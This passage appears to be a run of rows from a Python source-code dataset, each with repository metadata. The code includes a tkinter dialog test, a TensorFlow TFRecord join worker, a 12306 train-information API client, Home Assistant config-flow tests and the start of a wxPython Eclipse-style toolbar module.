        """
        Pretty print a list

        :type value: :class:`list`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        if not value:
            # Empty list collapses to a single token.
            self._print_level('[],', 0)
            return

        self._print_level('[', 0)
        for v in value:
            self._print_level('', level, False)
            self._process_value(v, level)
        self._print_level('],', level - self._indent)
| 34.955959 | 128 | 0.613207 | 1,607 | 13,493 | 4.969508 | 0.148102 | 0.038567 | 0.026296 | 0.019033 | 0.378162 | 0.339344 | 0.299274 | 0.269472 | 0.240671 | 0.204358 | 0 | 0.002849 | 0.29771 | 13,493 | 385 | 129 | 35.046753 | 0.839911 | 0.416957 | 0 | 0.175325 | 0 | 0 | 0.031823 | 0 | 0 | 0 | 0 | 0.005195 | 0 | 1 | 0.168831 | false | 0 | 0.064935 | 0.012987 | 0.396104 | 0.149351 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc43a6e6874e02847e5dd1f797f3d3037107d33 | 1,572 | py | Python | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | tests/test_tk_file_extention_dialog.py | MaxWeise/Filebackup_Automation | fc4b7480897b34b1b3315f5505c0b96c8714202d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
""" Testsuite for the user text input
Created 15.12.2021
@author Max Weise
"""
import unittest
from unittest import TestCase
from backup_script.tk_file_extention_dialog import TextInputDialog
class Test_TextInputDialog(TestCase):
    """ Testcase for the custom tkinter text input dialog."""

    # Instance under test, created fresh for each test in setUp().
    __UNDER_TEST: TextInputDialog

    def setUp(self) -> None:
        """ Setup an instance of the text input dialog."""
        self.__UNDER_TEST = TextInputDialog(title='Test Instance')

    def test_get_user_input(self) -> None:
        """ Test that the userinput is correct and gets returned as list of strings."""
        self.__UNDER_TEST.set_contents_input_dialog('Test Submit Button')  # Mock the userinput
        expected = ['Test', 'Submit', 'Button']

        self.__UNDER_TEST.run()
        actual = self.__UNDER_TEST.get_user_input()

        self.assertTrue(len(actual) > 0)
        self.assertEqual(len(actual), 3)
        # BUG FIX: list.sort() sorts in place and returns None, so the old
        # assertAlmostEqual(actual.sort(), expected.sort()) compared
        # None == None and always passed. Compare sorted copies instead.
        self.assertEqual(sorted(actual), sorted(expected))
        self.assertEqual(self.__UNDER_TEST.exit_code, 0)

    def test_cancle_button(self) -> None:
        """ Test the behaviour of the cancel button."""
        self.__UNDER_TEST.set_contents_input_dialog('Test Cancle Button')  # Mock the userinput
        expected = []

        self.__UNDER_TEST.run()
        actual = self.__UNDER_TEST.get_user_input()

        self.assertEqual(len(actual), 0)
        self.assertEqual(actual, expected)
        self.assertEqual(self.__UNDER_TEST.exit_code, 1)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 30.230769 | 97 | 0.681934 | 198 | 1,572 | 5.111111 | 0.383838 | 0.088933 | 0.115613 | 0.047431 | 0.37747 | 0.249012 | 0.249012 | 0.177866 | 0.100791 | 0.100791 | 0 | 0.010492 | 0.211832 | 1,572 | 51 | 98 | 30.823529 | 0.806295 | 0.215649 | 0 | 0.153846 | 0 | 0 | 0.060884 | 0 | 0 | 0 | 0 | 0 | 0.269231 | 1 | 0.115385 | false | 0 | 0.115385 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc5e0326ff06b4f88532664293de1aca3963505 | 3,993 | py | Python | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | efls-data/xfl/data/local_join/worker.py | finalljx/Elastic-Federated-Learning-Solution | fb588fdc03a2c1598b40b36712b27bdffdd24258 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from typing import List
import tensorflow_io
import tensorflow as tf
from tensorflow.python.platform import gfile
from xfl.data.local_join.aux_table import AuxTable
from xfl.data.local_join import utils
from xfl.data.local_join.sharding import FileSharding
from xfl.common.logger import log
# Eager mode is required so that `raw_record.numpy()` works while iterating
# the TFRecordDataset in LocalJoinWorker.run() (graph mode has no .numpy()).
tf.compat.v1.enable_eager_execution()
class LocalJoinWorker(object):
  """Joins sharded TFRecord input files against one or more auxiliary tables.

  Each input example must contain every key column in ``left_keys`` as a
  single-valued ``bytes_list`` feature. For each key/aux-table pair, the
  matching right-side example (if found) is merged into the left example
  before the record is written to the output shard.
  """

  def __init__(self,
               input_dir: str,
               output_dir: str,
               worker_idx: int,
               worker_num: int,
               left_keys: list,
               aux_tables: List[AuxTable],
               ):
    """
    :param input_dir: directory holding the input TFRecord files
    :param output_dir: directory the joined TFRecord files are written to
    :param worker_idx: index of this worker in [0, worker_num)
    :param worker_num: total number of workers sharing the shards
    :param left_keys: key feature names on the left (input) side,
        one per auxiliary table
    :param aux_tables: right-side lookup tables, parallel to left_keys
    :raises RuntimeError: if left_keys and aux_tables differ in length
    """
    self.input_dir = input_dir
    self.output_dir = output_dir
    self.aux_tables = aux_tables
    self.worker_idx = worker_idx
    self.worker_num = worker_num
    self.left_keys = left_keys
    self.shard_to_process = []
    # One join key per auxiliary table; anything else is a config error.
    if len(left_keys) != len(aux_tables):
      raise RuntimeError('left_keys size must be equal with aux_table size {}, got {}'
                         .format(len(aux_tables), len(left_keys)))

  def open(self):
    """Validate directories, open the aux tables and compute this worker's shards."""
    utils.assert_valid_dir(path=self.input_dir)
    if not gfile.Exists(self.output_dir):
      gfile.MakeDirs(self.output_dir)
    for t in self.aux_tables:
      t.open()
    sharding = FileSharding()
    self.shard_to_process = sharding.shard(worker_idx=self.worker_idx,
                                           worker_num=self.worker_num,
                                           input_path=self.input_dir,
                                           output_path=self.output_dir)
    log.info("worker {} will process {} shards...".format(self.worker_idx, len(self.shard_to_process)))

  def run(self):
    """Read, join and write every assigned shard.

    Each shard is a (input_path, output_path) pair produced by open().

    :raises RuntimeError: on missing input files or malformed key columns
    """
    for shard in self.shard_to_process:
      log.info("read file {}, and begin writing to file {}.".format(shard[0], shard[1]))
      if not gfile.Exists(shard[0]):
        raise RuntimeError("file {} does not exist, please check input data.".format(shard[0]))
      if not gfile.Exists(os.path.dirname((shard[1]))):
        gfile.MakeDirs(os.path.dirname(shard[1]))
      dataset = tf.data.TFRecordDataset(shard[0])
      # BUG FIX: the writer was previously closed only on the success path
      # and leaked when a malformed record raised; the context manager
      # guarantees flush/close either way.
      with tf.io.TFRecordWriter(shard[1]) as writer:
        for raw_record in dataset:
          example = tf.train.Example()
          example.ParseFromString(raw_record.numpy())
          for k, t in zip(self.left_keys, self.aux_tables):
            # Every key column must exist, be a bytes_list, and hold
            # exactly one value to be usable as a lookup key.
            if k not in example.features.feature:
              raise RuntimeError("key col {} is not in input record, please check your data.".format(k))
            if not example.features.feature[k].WhichOneof('kind')=='bytes_list':
              raise RuntimeError("key col {} type must be bytes_list, but got {}".format(k, example.features.feature[k].WhichOneof('kind')))
            if not len(example.features.feature[k].bytes_list.value) == 1:
              raise RuntimeError("key col {} length must be 1, but got {}".format(k, len(example.features.feature[k].bytes_list.value)))
            example_right_str = t.get(example.features.feature[k].bytes_list.value[0])
            # Missing right-side rows are simply skipped (left outer join).
            if example_right_str is not None:
              example_right = tf.train.Example()
              example_right.ParseFromString(example_right_str)
              example.MergeFrom(example_right)
          writer.write(example.SerializeToString())
      log.info("write to file {} end.".format(shard[1]))
| 46.430233 | 138 | 0.650889 | 539 | 3,993 | 4.680891 | 0.326531 | 0.022196 | 0.052319 | 0.045581 | 0.114546 | 0.075704 | 0.046373 | 0.031708 | 0 | 0 | 0 | 0.006816 | 0.2284 | 3,993 | 85 | 139 | 46.976471 | 0.812074 | 0.167042 | 0 | 0 | 0 | 0 | 0.110843 | 0 | 0 | 0 | 0 | 0 | 0.014706 | 1 | 0.044118 | false | 0 | 0.132353 | 0 | 0.191176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc67912cacb053d18b81a8c4ccd2fa05884f9dd | 8,528 | py | Python | wifi12306.py | Arnie97/emu-screenshot-server | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 42 | 2018-01-16T10:48:58.000Z | 2020-08-28T07:34:56.000Z | wifi12306.py | Arnie97/emu-screenshot | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 1 | 2018-11-12T06:20:50.000Z | 2018-11-12T06:45:30.000Z | wifi12306.py | Arnie97/emu-screenshot | a50526c0d852cd61050ba2926d43c84241d57afb | [
"MIT"
] | 4 | 2018-06-09T02:29:45.000Z | 2020-08-07T11:47:52.000Z | #!/usr/bin/env python3
from datetime import date
from itertools import chain
from operator import itemgetter
from os.path import commonprefix
from tickets import API
from typing import Any, Iterable, Dict, List, Optional, Tuple
from util import repl, AttrDict
# Maps the single-letter comment codes returned by the train-compile API to
# human-readable (Chinese) coach annotations; an empty string means the code
# carries no visible remark. Used by Wifi12306.explain_train_compile_list.
COMMENT_MAPPING = {
    'A': "",
    'B': "宿",
    'C': "广",
    'D': "办",
    'E': "宿广",
    'F': "",
    'G': "",
    'H': "联运",
    'I': "回转",
    'J': "",
    'K': "广办",
    'L': "欠",
    'M': "",
    'N': "残",
    'O': "残广",
    'P': "残办",
    'Q': "静",
}
class Wifi12306(API):
    # NOTE(review): the class docstring below presumably doubles as the API
    # base URL consumed by the `API` superclass — do not edit its text.
    'https://wifi.12306.cn/wifiapps/ticket/api/'

    def __init__(self):
        super().__init__()
        self.headers.update({
            'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.20(0x18001428) NetType/4G Language/zh_CN',
        })

    def request(self, *args, json=True, **kwargs):
        """Issue a request; unwrap the JSON envelope and raise on API errors."""
        resp = super().request(*args, json=json, **kwargs)
        if not json:
            return resp
        # A non-zero (or missing) 'status' signals an API-level failure.
        if resp.get('status', -1):
            raise APIError(resp.get('error'))
        return resp.get('data')

    @staticmethod
    def yyyymmdd_format(date: date) -> str:
        """Render a date as the compact YYYYMMDD string the API expects."""
        return date.isoformat().replace('-', '')

    @staticmethod
    def from_yyyymmdd_format(s: str) -> date:
        """Parse a compact YYYYMMDD string back into a date.

        BUG FIX: the original used '{0[:4]}'.format(s), but str.format does
        not support slicing — '0[:4]' treats ':4' as a string key and raises
        TypeError at runtime. Slice explicitly with an f-string instead.
        """
        return date.fromisoformat(f'{s[:4]}-{s[4:6]}-{s[6:8]}')

    def train_list_by_station_name(
        self,
        from_station_name: str,
        to_station_name: str,
        query_date: Optional[date]=None,
    ) -> List[Dict[str, Any]]:
        """List trains running between two stations on query_date (default: today)."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'stoptime/queryByStationName',
            params=dict(
                trainDate=query_date.isoformat(),
                fromStationName=from_station_name,
                toStationName=to_station_name))

    def run_rule_by_train_no(
        self,
        train_no: str,
        start_date: Optional[date]=None,
        end_date: Optional[date]=None,
    ) -> Dict[date, bool]:
        """Return {date: runs?} for a train over [start_date, end_date].

        Defaults: start today, end tomorrow.
        """
        if not start_date:
            start_date = date.today()
        if not end_date:
            end_date = date.fromordinal(start_date.toordinal() + 1)
        resp = self.get(
            'trainDetailInfo/queryTrainRunRuleByTrainNoAndDateRange',
            params=dict(
                start=self.yyyymmdd_format(start_date),
                end=self.yyyymmdd_format(end_date),
                trainNo=train_no))
        return {
            self.from_yyyymmdd_format(k): resp[k] == '1'
            for k in sorted(resp)
        }

    def stop_time_by_train_code(
        self,
        train_code: str,
        query_date: Optional[date]=None,
        big_screen: Optional[bool]=False,
    ) -> List[Dict[str, Any]]:
        """Return the stop timetable for a train code on query_date (default: today)."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'stoptime/queryByTrainCode',
            params=dict(
                getBigScreen=['NO', 'YES'][big_screen],
                trainDate=self.yyyymmdd_format(query_date),
                trainCode=train_code))

    def pre_seq_train_by_train_code(
        self,
        train_code: str,
        query_date: Optional[date]=None,
    ) -> List[Dict[str, Any]]:
        """Return the preceding legs run by the same train set."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'preSequenceTrain/getPreSequenceTrainInfo',
            params=dict(
                trainDate=self.yyyymmdd_format(query_date),
                trainCode=train_code))

    def train_set_type_by_train_code(self, train_code: str) -> Dict[str, Any]:
        """Return the rolling-stock (train set) type for a train code."""
        return self.get(
            'trainDetailInfo/getTrainsetTypeByTrainCode',
            params=dict(trainCode=train_code))

    def train_compile_list_by_train_no(self, train_no: str) -> List[Dict]:
        """Return the coach composition (compile list) for a train number."""
        return self.get(
            'trainDetailInfo/queryTrainCompileListByTrainNo',
            params=dict(trainNo=train_no))

    def train_equipment_by_train_no(self, train_no: str) -> List[Dict]:
        """Return depot/vehicle assignment records for a train number."""
        return self.get(
            'trainDetailInfo/queryTrainEquipmentByTrainNo',
            params=dict(trainNo=train_no))

    @staticmethod
    def denormalize_multiple_train_code(train_codes: Iterable[str]) -> str:
        """Collapse per-station train codes into the 'K123/4' combined form.

        Distinct codes share their common prefix; e.g. ['K123', 'K124']
        becomes 'K123/4'.
        """
        train_numbers = []
        for i, t in enumerate(train_codes):
            if i == 0:
                prefix = t
                last_train_number = t
                train_numbers.append(t)
            elif t != last_train_number:
                prefix = commonprefix([prefix, t])
                last_train_number = t
                train_numbers.append(t)
        return prefix + '/'.join(t[len(prefix):] for t in train_numbers)

    def info_by_train_code(self, train_code: str) -> Optional[Dict[str, Any]]:
        """Gather summary info (endpoints, distance, duration) for a train.

        Returns None when the timetable query comes back empty.
        """
        stations = self.stop_time_by_train_code(train_code)
        if not stations:
            return
        start_station, *_, end_station = stations
        train_code = self.denormalize_multiple_train_code(
            s['stationTrainCode'] for s in stations)
        train_no = start_station['trainNo']
        distance = end_station['distance']
        time_span = self.explain_time_span(end_station['timeSpan'])
        # Intentionally packs all locals (incl. stations) into the result.
        return AttrDict(locals())

    @staticmethod
    def explain_time_span(milliseconds: int) -> Tuple[int, int]:
        """Convert a millisecond duration into (hours, minutes)."""
        return divmod(milliseconds // 1000 // 60, 60)

    @classmethod
    def explain_stop_time(cls, stations: List[Dict[str, Any]]) -> str:
        """Format the stop timetable as an aligned text table.

        NOTE: mutates the station dicts in place (adds 'hours'/'minutes').
        """
        for s in stations:
            s['hours'], s['minutes'] = cls.explain_time_span(s['timeSpan'])
        return '\n'.join(chain(
            ['\n'],
            ['车次  里程 用时  编号 到站  发车  电报码 站名', '-' * 21],
            (
                '{stationTrainCode:5} {distance:4} {hours:02}:{minutes:02}'
                ' {stationNo} {arriveTime} {startTime} '
                '-{stationTelecode} {stationName}'.format_map(s)
                for s in stations),
        ))

    @staticmethod
    def explain_pre_seq_train(pre_seq_train: List[Dict[str, Any]]) -> str:
        """Format the preceding-legs list as an aligned text table."""
        return '\n'.join(chain(
            ['\n'],
            ['车次  里程 发时  到时  发站  到站', '-' * 18],
            (
                '{trainCode:5} {distance:>4} '
                '{startTime} {endTime} {startStation} {endStation}'.format_map(s)
                for s in pre_seq_train),
        ))

    @staticmethod
    def explain_train_equipment(train_equipment: List[Dict[str, Any]]) -> str:
        """Describe depot ownership and vehicle numbers for a train set."""
        depot = '{bureaName}局({deploydepotName}){depotName} '.format_map(
            train_equipment[0])
        vehicles = ' '.join(e['trainsetName'] for e in train_equipment)
        # More than one record means coupled (multiple-unit) operation.
        if len(train_equipment) > 1:
            vehicles += ' 重联'
        return depot + vehicles

    @staticmethod
    def explain_train_compile_list(train_compile_list: List[Dict]) -> str:
        """Format the coach composition as an aligned text table.

        NOTE: mutates the coach dicts in place (adds 'comment').
        """
        for c in train_compile_list:
            comment = c.get('commentCode')
            c['comment'] = ' ' + comment + ' ' + COMMENT_MAPPING.get(comment, '')
        return '\n'.join(chain(
            ['\n'],
            ['编号 车种    定员  附注', '-' * 10],
            ('{coachNo:4} {coachType:4.4} {limit1:3} {comment}'.
             format_map(c) for c in sorted(
                train_compile_list, key=itemgetter('coachNo'))),
        ))

    def repl_handler(self, train_code: str) -> str:
        """Look up and print everything known about a train code; REPL callback."""
        try:
            info = self.info_by_train_code(train_code)
        except APIError as e:
            print(e)
            return '> '
        print(
            '{train_code}({start_station[stationName]}-'
            '{end_station[stationName]},{distance} km,'
            '{time_span[0]:02}:{time_span[1]:02})'.format_map(info))
        train_equipment = self.train_equipment_by_train_no(info.train_no)
        if train_equipment:
            print(self.explain_train_equipment(train_equipment))
        else:
            # NOTE(review): train_set_type_by_train_code takes a train *code*
            # but receives train_no here — looks suspicious; confirm against
            # the API before changing.
            train_set_type = self.train_set_type_by_train_code(info.train_no)
            if train_set_type:
                print('{trainsetType}{trainsetTypeName}'.format_map(
                    train_set_type))
        train_compile_list = self.train_compile_list_by_train_no(info.train_no)
        if train_compile_list:
            print(self.explain_train_compile_list(train_compile_list))
        print(self.explain_stop_time(info.stations))
        pre_seq_train = self.pre_seq_train_by_train_code(train_code)
        if pre_seq_train:
            print(self.explain_pre_seq_train(pre_seq_train))
        return '> '
class APIError(ValueError):
    """Raised when the 12306 Wi-Fi API responds with a non-zero status."""
# Start the interactive train-query loop when executed as a script.
if __name__ == '__main__':
    repl(Wifi12306().repl_handler)
| 33.443137 | 198 | 0.577744 | 992 | 8,528 | 4.72379 | 0.257056 | 0.044174 | 0.034144 | 0.017926 | 0.307298 | 0.245625 | 0.202732 | 0.148314 | 0.13679 | 0.13679 | 0 | 0.015521 | 0.297373 | 8,528 | 254 | 199 | 33.574803 | 0.766522 | 0.007505 | 0 | 0.256881 | 0 | 0.004587 | 0.142723 | 0.064425 | 0 | 0 | 0.001176 | 0 | 0 | 1 | 0.087156 | false | 0.004587 | 0.03211 | 0.03211 | 0.224771 | 0.03211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc69200893675851efff0c9ed38ba8da908af17 | 1,648 | py | Python | tests/components/coronavirus/test_config_flow.py | basicpail/core | 5cc54618c5af3f75c08314bf2375cc7ac40d2b7e | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | tests/components/coronavirus/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/components/coronavirus/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11 | 2020-12-16T13:48:14.000Z | 2022-02-01T00:28:05.000Z | """Test the Coronavirus config flow."""
from unittest.mock import MagicMock, patch
from aiohttp import ClientError
from homeassistant import config_entries, setup
from homeassistant.components.coronavirus.const import DOMAIN, OPTION_WORLDWIDE
from homeassistant.core import HomeAssistant
async def test_form(hass: HomeAssistant) -> None:
    """Verify the user config flow shows a form and creates an entry."""
    await setup.async_setup_component(hass, "persistent_notification", {})

    init_result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert init_result["type"] == "form"
    assert init_result["errors"] == {}

    entry_result = await hass.config_entries.flow.async_configure(
        init_result["flow_id"],
        {"country": OPTION_WORLDWIDE},
    )
    assert entry_result["type"] == "create_entry"
    assert entry_result["title"] == "Worldwide"
    assert entry_result["result"].unique_id == OPTION_WORLDWIDE
    assert entry_result["data"] == {"country": OPTION_WORLDWIDE}

    await hass.async_block_till_done()
    # Setting up the worldwide entry registers exactly four sensor states.
    assert len(hass.states.async_all()) == 4
@patch(
    "coronavirus.get_cases",
    side_effect=ClientError,
)
async def test_abort_on_connection_error(
    get_cases_mock: MagicMock, hass: HomeAssistant
) -> None:
    """Verify the config flow aborts when the upstream API is unreachable."""
    await setup.async_setup_component(hass, "persistent_notification", {})

    flow_result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert "type" in flow_result
    assert flow_result["type"] == "abort"
    assert "reason" in flow_result
    assert flow_result["reason"] == "cannot_connect"
| 32.313725 | 79 | 0.703277 | 193 | 1,648 | 5.80829 | 0.352332 | 0.069581 | 0.040143 | 0.058876 | 0.332739 | 0.284567 | 0.256913 | 0.256913 | 0.256913 | 0.256913 | 0 | 0.004425 | 0.177184 | 1,648 | 50 | 80 | 32.96 | 0.822271 | 0.020024 | 0 | 0.153846 | 0 | 0 | 0.125162 | 0.04345 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0 | false | 0 | 0.128205 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc8836265bf50d2912b69d0feaa958739783ce7 | 64,150 | py | Python | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 9 | 2018-10-15T04:57:37.000Z | 2021-12-07T07:39:35.000Z | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 13 | 2018-10-19T11:52:44.000Z | 2021-09-08T00:39:30.000Z | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 3 | 2018-10-25T11:08:04.000Z | 2021-02-23T08:28:31.000Z | import logging.config
import wx
from src.sqlite_executer.ConnectExecuteSqlite import SQLExecuter
from src.view.AutoCompleteTextCtrl import TextCtrlAutoComplete
# from src.view.TreePanel import CreatingTreePanel
from src.view.constants import *
from wx.lib.agw.aui.aui_constants import actionDragFloatingPane, AUI_DOCK_NONE, \
ITEM_NORMAL, ITEM_CHECK, ITEM_RADIO, ID_RESTORE_FRAME, \
AUI_BUTTON_STATE_NORMAL, AUI_BUTTON_STATE_PRESSED
from src.view.views.file.explorer.FileBrowserPanel import FileBrowser
from src.view.views.console.SqlOutputPanel import SqlConsoleOutputPanel
from src.view.views.console.worksheet.WorksheetPanel import CreateWorksheetTabPanel, \
CreatingWorksheetWithToolbarPanel
from src.view.views.sql.history.HistoryListPanel import HistoryGrid
from src.view.views.console.worksheet.WelcomePage import WelcomePanel
from wx.lib.agw.aui.framemanager import NonePaneInfo, wxEVT_AUI_PANE_MIN_RESTORE, \
AuiManagerEvent
from src.view.util.FileOperationsUtil import FileOperations
from wx.lib.platebtn import PlateButton, PB_STYLE_DEFAULT, PB_STYLE_DROPARROW
# from wx.lib.pubsub import setupkwargs
# regular pubsub import
from pubsub import pub
from wx.lib.agw.aui.auibar import AuiToolBarEvent, \
wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, \
wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK
from src.view.views.python.explorer.PythonExplorer import PythonExplorerPanel
from wx import py
from src.view.views.java.explorer.JavaExplorer import CreatingJavaExplorerPanel
from src.view.views.project.explorer.ProjectExplorer import CreatingProjectExplorerPanel
from src.view.views.database.explorer.DataSourceExplorer import DataSourcePanel
from wx.lib.agw.aui import auibook
from src.view.other.new.NewFlow import NewFlowFrame
# Configure logging once at import time from the shared settings dict and
# grab the module-wide logger used throughout this file.
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('extensive')
try:
from agw import aui
from agw.aui import aui_switcherdialog as ASD
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.aui as aui
from wx.lib.agw.aui import aui_switcherdialog as ASD
############################################################
class EclipseAuiToolbar(aui.AuiToolBar):
    """AuiToolBar variant with Eclipse-style perspective buttons.

    Overrides the mouse handlers so that the pressed state of a perspective
    button is sticky (radio-like), except for the special 'Open Perspective'
    button which is never latched. Also subscribes to pubsub topics for
    perspective selection and page-title updates.
    """

    def __init__(self, parent):
        super().__init__(parent, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
        # React to perspective clicks and editor page-title changes.
        pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
        pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')

    def __onObjectAdded(self, data, extra1, extra2=None):
        # pubsub callback for 'perspectiveClicked'.
        # NOTE(review): these look like leftover debug prints — consider
        # routing through `logger` instead.
        # no longer need to access data through message.data.
        print('Object', repr(data), 'is added')
        print(extra1)
        if extra2:
            print(extra2)

    def __onUpdatePageText(self, filePath, extra1, extra2=None):
        # pubsub callback for 'onUpdatePageText'.
        # no longer need to access data through message.data.
        logger.info(f'EclipseAuiToolbar.onUpdatePageText {filePath}')
        print(extra1)
        if extra2:
            print(extra2)

    def getToolBarItemById(self, id=None):
        # Linear scan of the toolbar items; returns None when no item has
        # the given id.
        item = None
        for _item in self._items:
            if _item.id == id:
                item = _item
                break
        return item

    def OnLeaveWindow(self, event):
        """
        Handles the ``wx.EVT_LEAVE_WINDOW`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        self.RefreshOverflowState()
        # Unlike the stock AuiToolBar, hover/pressed state is deliberately
        # NOT cleared here so the active perspective button stays latched.
        # self.SetHoverItem(None)
        # self.SetPressedItem(None)
        #
        # self._tip_item = None
        self.StopPreviewTimer()

    def SetPressedItem(self, pitem):
        """
        Sets a toolbar item to be currently in a "pressed" state.
        :param `pitem`: an instance of :class:`AuiToolBarItem`.
        """
        # The 'Open Perspective' button is a momentary action and must never
        # be latched; everything else behaves radio-style (unpress the old,
        # press the new).
        if pitem and pitem.label != 'Open Perspective':
            former_item = None
            for item in self._items:
                if item.state & aui.AUI_BUTTON_STATE_PRESSED:
                    former_item = item
                    item.state &= ~aui.AUI_BUTTON_STATE_PRESSED
            pitem.state &= ~aui.AUI_BUTTON_STATE_HOVER
            pitem.state |= aui.AUI_BUTTON_STATE_PRESSED
            if former_item != pitem:
                self.Refresh(False)
                self.Update()

    def OnLeftUp(self, event):
        """
        Handles the ``wx.EVT_LEFT_UP`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        self.SetPressedItem(None)
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if hit_item and not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
            self.SetHoverItem(hit_item)
        if self._dragging:
            # reset drag and drop member variables
            self._dragging = False
            self._action_pos = wx.Point(-1, -1)
            self._action_item = None
        else:
            if self._action_item and hit_item == self._action_item:
                self.SetToolTip("")
                if hit_item.kind in [ITEM_CHECK, ITEM_RADIO]:
                    toggle = not (self._action_item.state & aui.AUI_BUTTON_STATE_CHECKED)
                    self.ToggleTool(self._action_item.id, toggle)
                    # repaint immediately
                    self.Refresh(False)
                    self.Update()
                    e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
                    e.SetEventObject(self)
                    e.SetInt(toggle)
                    self._action_pos = wx.Point(-1, -1)
                    self._action_item = None
                    self.ProcessEvent(e)
                    self.DoIdleUpdate()
                else:
                    if self._action_item.id == ID_RESTORE_FRAME:
                        # find aui manager
                        manager = self.GetAuiManager()
                        if not manager:
                            return
                        if self._action_item.target:
                            pane = manager.GetPane(self._action_item.target)
                        else:
                            pane = manager.GetPane(self)
                        # from . import framemanager
                        e = AuiManagerEvent(wxEVT_AUI_PANE_MIN_RESTORE)
                        e.SetManager(manager)
                        e.SetPane(pane)
                        manager.ProcessEvent(e)
                        self.DoIdleUpdate()
                    else:
                        e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
                        e.SetEventObject(self)
                        self.ProcessEvent(e)
                        self.DoIdleUpdate()
            # reset drag and drop member variables
            self._dragging = False
            self._action_pos = wx.Point(-1, -1)
